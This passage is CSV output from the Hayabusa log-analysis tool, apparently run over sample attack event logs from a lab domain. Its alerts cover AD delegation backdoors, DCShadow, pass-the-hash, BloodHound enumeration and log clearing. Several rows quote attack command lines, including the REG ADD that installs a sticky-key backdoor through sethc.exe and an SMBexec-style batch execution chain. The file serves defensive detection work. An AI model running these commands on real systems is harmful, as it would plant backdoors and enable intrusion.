Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User 
Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:08:00.382 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User 
Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.384 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User 
Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1183,technique_name=Image File Execution Options Injection | CreateKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe | Process: C:\Windows\system32\reg.exe | PID: 4932 | PGUID: 5D63072B-84DE-6086-7B49-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1183,technique_name=Image File Execution Options Injection | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 4932 | PGUID: 5D63072B-84DE-6086-7B49-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:16:14.119 
+09:00,srvdefender01.offsec.lan,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:17:14.111 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"" /t REG_SZ /v Debugger /d ""C:\windows\system32\cmd.exe"" /f | Path: C:\Windows\System32\reg.exe | PID: 0x1b30 | User: admmig | LID: 0x2b5f6bf",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx +2021-04-26 18:17:37.439 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\windows\system32\cmd.exe sethc.exe 211 | Path: C:\Windows\System32\cmd.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx +2021-04-26 18:18:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1464 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options 
Injection/ID4688-Stickey command reg update + execution.evtx +2021-04-26 19:04:23.189 +09:00,srvdefender01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx +2021-04-26 23:16:45.757 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\seth2c.exe | Process: C:\Windows\system32\cmd.exe | PID: 1960 | PGUID: 7CF65FC7-C199-6086-520A-000000002000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx +2021-04-26 23:16:47.267 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\sethc.exe | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3328 | PGUID: 7CF65FC7-CAF6-6086-930A-000000002000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx +2021-04-27 00:03:05.976 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\Temp\execute.bat | Process: C:\Windows\system32\cmd.exe | PID: 3492 | PGUID: 7CF65FC7-D629-6086-B70A-000000002000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID11,13-SMBexec service registration.evtx" +2021-04-27 00:03:05.992 +09:00,fs02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: 
C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat | LID: 0x3e7 | PID: 3068 | PGUID: 7CF65FC7-D629-6086-B80A-000000002000 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMIexec process execution.evtx +2021-04-27 00:16:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1548 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x5429550,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" 
+2021-04-27 00:16:03.992 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x542957e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 00:16:04.047 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\mmc.exe -Embedding | Path: C:\Windows\System32\mmc.exe | PID: 0xda4 | User: SRVDEFENDER01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 00:16:04.284 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x542a072,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 20:04:03.495 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 20:04:03.502 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 20:04:13.291 
+09:00,rootdc1.offsec.lan,5136,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 20:04:53.341 +09:00,rootdc1.offsec.lan,5136,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 23:54:29.317 +09:00,webiis01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2383c301,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:54:31.493 +09:00,pki01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x20ee2c3d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:54:49.355 +09:00,webiis01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2383c901,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:54:51.591 +09:00,pki01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | 
Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x20ee3135,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:28.669 +09:00,mssql01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2847721c,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:34.819 +09:00,atanids01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x74005fb3,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:45.042 +09:00,exchange01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0xb108529d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:45.392 +09:00,adfs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 
0x1f6f93ef,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:46.789 +09:00,fs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x26fd49db,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:47.449 +09:00,prtg-mon.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x204a9a12,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:48.746 +09:00,mssql01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x28477800,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:49.695 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x62cbf9f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share 
Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:50.629 +09:00,atacore01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x369f8ca7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:54.886 +09:00,atanids01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x740075dc,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:05.147 +09:00,exchange01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0xb1086cfb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:05.466 +09:00,adfs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x1f6f9930,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:06.878 +09:00,fs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 
10.23.23.9 | LID: 0x26fd4ec6,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:07.557 +09:00,prtg-mon.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x204aa3a4,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:09.605 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x62cf99e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:10.730 +09:00,atacore01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x369f96be,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.723 +09:00,fs02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x3902ac4,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share 
Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.762 +09:00,dhcp01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x5df84d08,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.790 +09:00,wsus01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x57d352ca,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.920 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x13fa915,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:18.001 +09:00,win10-02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x87371f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:20.658 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: 
\??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:30.691 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.825 +09:00,fs02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 